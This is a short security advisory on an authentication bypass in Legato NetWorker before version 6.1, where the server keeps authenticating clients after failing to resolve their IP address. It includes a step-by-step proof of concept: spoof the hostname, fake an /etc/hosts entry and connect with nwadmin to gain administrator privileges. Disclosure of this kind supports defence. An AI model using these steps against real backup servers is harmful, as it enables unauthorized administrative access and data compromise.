|
|
|
|
| |
| Legato NetWorker is a solution for addressing the data storage needs of large and small heterogeneous enterprise environments. A security vulnerability in the product allows attackers to bypass the authentication procedure of the Legato NetWorker application. |
| |
Credit:
The information has been provided by 10function.
|
| |
Vulnerable systems:
Legato NetWorker prior to version 6.1
There is a weakness in the authentication scheme of Legato NetWorker Software. When a client contacts the server, it announces (in clear text) via RPC his hostname or IP address, his username and the user's groups. Then the server tries to resolve the IP address of the machine that have initiated the dialog, if it fails, it sends an "unknown host" answer but does not stop the authentication process. As a result, every machine which IP could not be resolved by the server can fake any host or user. In addition, by this way gain then administrator privilege onto the NetWorker admin interface.
Proof concept:
Here, we suppose that "server" is the NetWorker's server which IP is 1.2.3.4.
We are now using a machine that could communicate freely with "server" called "intruder" which IP is A.B.C.D
Prerequisite: "server" must be unable to perform a reverse lookup for the hostname "intruder" into an IP address (This machine is unknown in /etc/hosts and the associated DNS zone).
Therefore, as root on "intruder", we will do the followings actions:
* Change the hostname of the machine in order to fake server's one:
# hostname server
* Fake also the resolution mechanism onto the intruder machine
Add "A.B.C.D server" into /etc/hosts
* Contact the server by 'nwadmin -s 1.2.3.4'
* Now the server thinks your are @root=40server so he will be probably let you the admin privileges.
(You can eventually fake another user by creating this user on "intruder" and doing a 'su')
|
|
|
|
|
|
|
|
|
|
